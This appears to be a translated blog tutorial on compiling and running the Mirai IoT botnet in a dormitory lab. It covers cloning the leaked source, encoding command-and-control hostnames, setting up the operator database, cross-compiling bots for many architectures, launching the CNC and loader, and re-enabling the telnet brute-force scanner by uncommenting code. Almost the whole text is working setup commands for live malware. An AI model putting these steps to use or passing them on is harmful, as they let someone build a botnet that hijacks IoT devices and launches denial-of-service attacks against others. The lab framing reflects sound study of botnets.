I. Preparation
1.Mirai uses two programming languages, C and Go, to store data in a database, so the following commands are required for the software to be installed in advance:
sudo apt-get install git sudo apt-get install gcc sudo apt-get install golang sudo apt-get install electric-fence sudo apt-get install mysql-server mysql-client
2. Download the source code
git clone https://github.com/jgamblin/Mirai-Source-Code
3. Modify parameters and configure CNC
cd mirai/tools && gcc enc.c -o enc.out //Compile enc Executable for ip Address XOR ./enc.out string cnc.changeme.com //Will return a string of "\x"String (actually encrypted) cnc.changeme.com) ./enc.out string report.changeme.com //Will return a string of "\x"Character string
Replace the'\x'string in the tables.c file for rows 18 and 21 and another parameter after it
Remember: to modify two parameters!(\x string and subsequent length parameters)
4. Configure the database
cd ../../scripts //Get into script Catalog gedit db.sql //Edit Big db.sql file
Add use mirai; see below
service mysql start //start-up Mysql service cat db.sql | mysql -uroot -proot mysql -uroot -proot //Both with username and password`root`Log on to the database INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, ''); //Added Users exit //Sign out
Modify the user name and password in mirai/cnc/main.go as set.Modified as follows
5. Configure the cross-compilation environment
cd .. && mkdir cross-compmile-bin //Here is the`Mirai-Source-Code`New under Catalog cd cross-compile-bin
Download the following 11 compressed packages
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2
(It may drop very slowly.I'll put one under me here.Links: https://pan.baidu.com/s/1Z89uaV7boW2SRjIv6Y0Iig
Extraction Code: 7o34)
cd ../scripts sudo ./cross-compile.sh
The compilation process will prompt if mysql is installed or not
gedit ~/.bashrc //Open environment variable
Put the following at the end
export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin export GOPATH=$HOME/go
source ~/.bashrc //Refresh environment variables
6. Compile CNC and bot
go get github.com/go-sql-driver/mysql go get github.com/mattn/go-shellwords cd ../mirai ./build.sh debug telnet cd ../loader ./build.sh
The environment is now fully configured.
2. Description
Equipment condition:
Computer A: As the first infected device.Run. /mirai.dbg on port 48101 for scan blasting.
Computer B: As CNC&Loader.
CNC: Run on ports 23 and 101 respectively. /cnc sends attack instructions and maintains connection with bot.
Loader: Runs on port 48101. /scanList continuously listening.
Connection:
1PC A and B connect the dormitory LAN through wifi.
2 Cameras A and B use switches to connect with dormitory routers.
The ultimate goal is to ensure that the four devices are connected to each other on the same network.
3. Testing
1. A little adjustment is needed
Since the cnc startup occurs in the / debug/cnc directory, the source code writes the absolute path.(as shown below)
So we moved prompt.txt from the mirai directory to / debug/cnc.
Figure
2. Start CNC (Computer B)
go build -o debug/cnc cnc/*.go //Run under mirai directory ./debug/cnc
Get the picture:
Open a new terminal to try to connect (Administrator privileges may be required)
telnet cnc.change.com 23
After getting the following prompt, press Enter again and enter your username password to log in
Getting feedback from the image below indicates successful login!
3 Start loader (PC B)
cd mirai/debug sudo ./scanListen
By looking at port 48101, you can see that the port is running the program
netstat -lput // View port instructions
4 Start the scanning program (Computer A)
Since the source code turns scanner off by default in debug mode, comments on lines 157 and 162 in bot/main.c will run.
Then recompile the run
Run under the mirai directory as follows
./build.sh debug telnet
Run as follows in the mirai/debug directory (be careful to use administrator privileges here)
sudo ./mirai.dbg
The scan will start as follows:
5 Control Scan ip
Since an ip is randomly found in the source code to explode (starting at line 674 mirai/bot/scanner.c), it is temporarily possible to fix an ip address scan after modifying the code.After modification, the first fixed bit is''10', the result is as follows:
Reference resources: